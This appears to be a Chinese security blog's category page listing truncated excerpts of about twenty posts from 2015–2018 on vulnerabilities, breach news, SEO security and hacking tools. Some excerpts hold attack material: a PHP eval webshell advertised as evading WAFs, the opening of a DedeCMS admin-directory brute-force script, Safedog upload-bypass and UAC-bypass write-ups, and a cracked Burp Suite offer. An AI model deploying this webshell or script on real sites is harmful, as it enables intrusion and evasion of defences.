网络安全

  • ueditor编辑器上传漏洞

    UEditor是由百度WEB前端研发部开发的所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点。开源基于BSD协议,所有源代码在协议允许范围内可自由修改和使用。百度UEditor的推出,可以帮助不少网站开发者在开发富文本编辑器所遇到的难题,节约开发者因开发富文本编辑器所需要的大量时间,有效降低了企业的开发成本。 ueditor ASPX 版本…

    2018年10月19日 13.54K
  • Bypass安全狗4.0上传

    1. 安全狗简介 安全狗云安全平台(服云),提供专业的云安全服务,解决在混合云、私有云、公有云及传统环境下可能遇到的各种安全与管理问题。并积极参与国内云计算生态的建设中,对接各大云计算平台,已经跟阿里云、腾讯云、华为云、天翼云等云计算平台建立合作伙伴关系。 绕过手法 安全狗对文件上传一般有两层拦截,第一层就是对上传的木马拦截,如果突破了第一层,攻击者访问木马…

    网络安全 2018年10月16日 2.03K
  • WIN服务器爆破DEDECMS后台目录

    利用脚本python: #!/usr/bin/env python ”’/* * author = Mochazz * team = 红日安全团队 * env = pyton3 * */ ”’ import requests import itertools characters = “abcdefghijklmnopqrstuvwxyz01234567…

    2018年9月29日 2.32K
  • 过90% 安全软件和waf的PHP一句话。

    可能过90% 安全软件和waf的PHP一句话。 PHP代码: <?php function login(){ $t=$_POST[0]; for ($i=0;$i<strlen($t);$i+=2) $c.=urldecode(“%”.substr($t,$i,2)); return $c; } eval(login())…

    2018年9月29日 1.72K
  • 渗透测试神器burpsuite_pro_v2.0 Beta含注册机

    Burp Suite 是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。同时具备很高的灵活性和可扩展性,允许用户结合手动和自动化技术枚举、分析和攻击Web应用程序。这些不同的工具通过协同工作,可有效…

    2018年8月28日 3.27K
  • “黑客导师”带大学生徒弟攻击300家网站,双双入狱

    IT之家7月19日消息 据成都商报报道,90后“黑客导师”彭岩(化名)和其学生唐斌(化名)因多次利用黑客技术入侵政府、商业网站,窃取出售个人信息受到处罚。今年6月,泸州市江阳区人民法院宣判:犯罪嫌疑人彭岩犯传授犯罪方法罪,判处有期徒刑1年6个月;犯罪嫌疑人唐斌犯侵犯公民个人信息罪,判处有期徒刑3年1个月,并处罚金4000元。 据报道,“他只是一个初中生,20…

    2018年7月19日 1.42K
  • Autocrack:一款强大的自动化Hash破解工具

    今天给大家介绍的是一款名叫Autocrack的自动化Hash破解工具。 工具介绍 实际上,Autocrack不仅是一个Python脚本,它是一个Hashcat封装器,它能够帮助渗透测试人员自动化执行Hash破解任务。这个脚本提供了多种功能来帮助测试人员选择字典集和破解规则,而且还能够进行暴力破解攻击。Autocrack基于的是Python 3,这个Pytho…

    2018年7月18日 1.69K
  • 新浪新闻首页疑似被劫持长达数小时,跳转博彩网站

    网页劫持是博彩推广链中惯用的手段之一,而对于新浪、腾讯这种级别的大型成熟门户网站,虽然是博彩网站劫持的最佳目标,但往往不太可能成功。日均数千万PV,即便被劫持几分钟也足够给博彩网站带来非常可观的传播量。而今天早上,新浪新闻首页疑似被劫持长达数小时,访问自动跳转博彩网站。 在微博、V2ex、虎扑数码区,均有不少网友反映新浪新闻首页异常跳转的问题,从微博上最早发…

    网络安全 2018年7月18日 1.64K
  • IIS深入浅出之短文件漏洞知多少

    一、 什么是IIS Internet Information Services(IIS,以前称为Internet Information Server)互联网信息服务是Microsoft公司提供的可扩展Web服务器,支持HTTP,HTTP/2,HTTPS,FTP,FTPS,SMTP和NNTP等。起初用于Windows NT系列,随后内置在Windows 20…

    网络安全 2018年5月26日 2.35K
  • Python 绝技 —— TCP 服务器与客户端

    0x00 前言 「网络」一直以来都是黑客最热衷的竞技场。数据在网络中肆意传播:主机扫描、代码注入、网络嗅探、数据篡改重放、拒绝服务攻击……黑客的功底越深厚,能做的就越多。Python 作为一种解释型脚本语言,自 1991 年问世以来,其简洁、明确、可读性强的语法深受黑客青睐,特别在网络工具的编写上,避免了繁琐的底层语法,没有对运行速度的高效要求,使得 Pyt…

    2018年5月25日 1.85K
  • 中国工业信息安全大会发布《工业控制系统信息安全防护指引》

    2018年5月25日,中国工业信息安全大会工业信息安全发展趋势分论坛在北京举行。会上,国家工业信息安全发展研究中心副主任万鹏远正式发布了《工业控制系统信息安全防护指引》(简称《指引》)。该教材是基于《工业控制系统信息安全防护指南》(简称《防护指南》)的权威技术读本,对工控安全形势、政策、防护技术与实践等做出了较为全面的介绍,并系统地提出了具体可行的防护策略、…

    2018年5月25日 2.22K
  • 利用注册表键值绕过UAC实现提权

    Think Bad,Do Good 近期我们打算公开一系列文章,本篇文章为第一篇,欢迎大家的阅读。我们的目的是提供足够多的和安全威胁相关的技术数据来解决大家心中的疑惑,不仅如此,也希望大家可以理解我们所面临安全威胁的内部技术原理。这一系列的文章列举了一些我们认为大家会比较感兴趣且熟知的攻击场景。某些攻击技术涉及的技术复杂度比较高,我们会进一步的分析纰漏攻击技…

    网络安全 2018年5月25日 2.27K
  • Brain Food 僵尸网络散布恶意 PHP 脚本,已有超 5000 个网站受损

    据外媒报道, Proofpoint 研究员 Andrew Conway 上周对一个名为” Brain Food ”的僵尸网络进行了剖析。根据 Conway 的说法,由该僵尸网络推动的垃圾邮件活动早在去年 3 月就已被发现,其源头可能是来自于一个恶意的 PHP 脚本,因为该脚本一直秘密地将用户重定向到减肥和提高智力药片的网页上。据统计,目前已有超过 5000 …

    2018年5月25日 1.18K
  • VPNFilter 大规模来袭,感染几十个国家 50 万台路由器和存储设备

    北京时间 5 月 23 日晚,思科公司发布安全预警称,俄罗斯黑客利用恶意软件,已感染几十个国家的至少50万台路由器和存储设备。攻击中使用了高级模块化恶意软件系统“VPNFilter”,这是思科 Talos 团队与多个部门以及执法机构一直追踪研究的恶意软件。尽管目前研究尚未完成,但思科决定提前公布结果,以便受害者及潜在受害者及时防御与响应。 结合该恶意软件近期…

    2018年5月24日 2.01K
  • WordPress <= 4.6.1 使用语言文件任意代码执行漏洞

    一、漏洞概述 WordPress是一个以PHP和MySQL为平台的自由开源的博客软件和内容管理系统,近日在github 上爆出这样一个漏洞,在其<=4.6.1版本中,如果网站使用攻击者提前构造好的语言文件来对网站、主题、插件等等来进行翻译的话,就可以执行任意代码。 二、漏洞影响及利用条件 任意代码执行,但有以下两个前提: 1、攻击者可以上传自己构造的语…

    网络安全 2018年5月21日 938
  • 网站被黑帽SEO劫持到黑吃黑。

    之前百度MIP出来的时候,自己也找了一个站点去做了MIP来测试一下MIP的效果,说起MIP大家自然会想到闪电算法,当然我也发现MIP在逐渐的走向成熟。在后续中也在推动移动端的重要地位,这里话不多说,直接进入我们的正题。今天偶然的无聊去看了一下自己的站点,我比较习惯搜索URL地址,然后在点开网站。 因此就让我碰见了这样的情况: 刚开始的时候我还想着,不对啊,站…

    2017年10月25日 3.22K
  • HTTPS和SEO那点事儿

    随着网络的不断发展,越来越多的企业和个人对网站安全意识的增强,国家和政府方面也在不断的引导站点重视网络安全,但是光靠一些安全防护软件还不能够起到很好的防护,而Https则可以有效的防范网站被劫持等情况。 一、HTTPS对SEO的影响 谷歌对带HTTPS站点的如果站点不是HTTPS那么在谷歌浏览器中则会被标记不安全的字样,在相同条件下,2个站点,某个站点拥有H…

    2017年9月7日 2.89K
  • 2017将是我李春的转折点

    2017年是属于我李春的一个转折点,自己从一个17岁的少年转变成一个18岁的成年人,也应该褪去哪些稚嫩的外表和气质,慢慢走向成熟,人生这趟列车虽然很长,也不知道需要走多久,但是每路过一个站点的时候就会遇到不同的人也会发现新奇的事情,也欢笑也有辛酸,在新的一年里自己也即将毕业步入社会,其实谈到工作自己说实战的并没有太多的期望,只是希望自己开开心心的就足够了,曾…

    2017年1月1日 3.50K
  • 网站被黑怎么处理?

    前段时间网站备案导致站点无法访问,最近网站由闭站保护到网站闭站恢复阶段,站点也出现了一系列的问题,比如同IP下的站点被入侵导致网站安全受到影响,一般网站被黑多半是用于站点挂黑链一类的操作,对于很多没有安全意识的站长以为只要把这些代码删除了就可以解决问题,但是道高一尺,魔高一丈,如果只是简简单单的删除黑链的代码,网站还是会被黑第二次,不能根本上解决问题,这里石…

    2016年12月30日 2.04K
  • seo网站优化必须要注重安全

    很多在站长,尤其是对于网络安全这块懂的不是太多的站长,对网络安全这块很不重视,今天在某知名平台QQ交流群中就遇到一个这样的问题。起因某站点站长想让群里帮忙看看是不是百度蜘蛛,我们先来看一下这个图片 图中如果细心的人就会发现,这些都是一些网站的后门路径,有人在恶意扫描,要知道百度蜘蛛是不可能平白无故的爬行这些也页面的,做seo的对一些搜索的语法,相信大家并不陌…

    2016年6月18日 1.77K
  • 网站被惩罚原因分析

    今天小编,在某seo群中,有位朋友说:“为什么之前百度有排名 有收录 没有几天的时候 全部都没有。” 首先,我们最先想到的是什么?  网站被惩罚了,那么也不排除站点刚刚搭建起来,进入沙盒期, 我们site一下这个站点吧。看下图 网站site一切都很正常,我们在看看后面的收录页面! 当我们看见这张图的时候,很多有过类似经历的朋友应该就会想到,站点被hei 了 …

    2015年12月15日 1.64K
  • 网站安全不仅仅在于站点本身漏洞!

    网站被黑?  很多人第一点想到的就是自己网站被黑客盯上了,那么如果你是一个新站呢?石家庄seo这里就有一个真实的案例,这里我们仅仅拿来作为案例,希望大家引以为鉴!要重视安全! 这里我就不公开我的聊天纪律,我就大概说一下,社工, 首先我了解到我朋友的空间商地址,然后我就拿我自己qq,以我朋友的身份就,让空间商,帮我修改东西了,详细内容我不会公开,以免不坏好心的…

    2015年11月18日 1.50K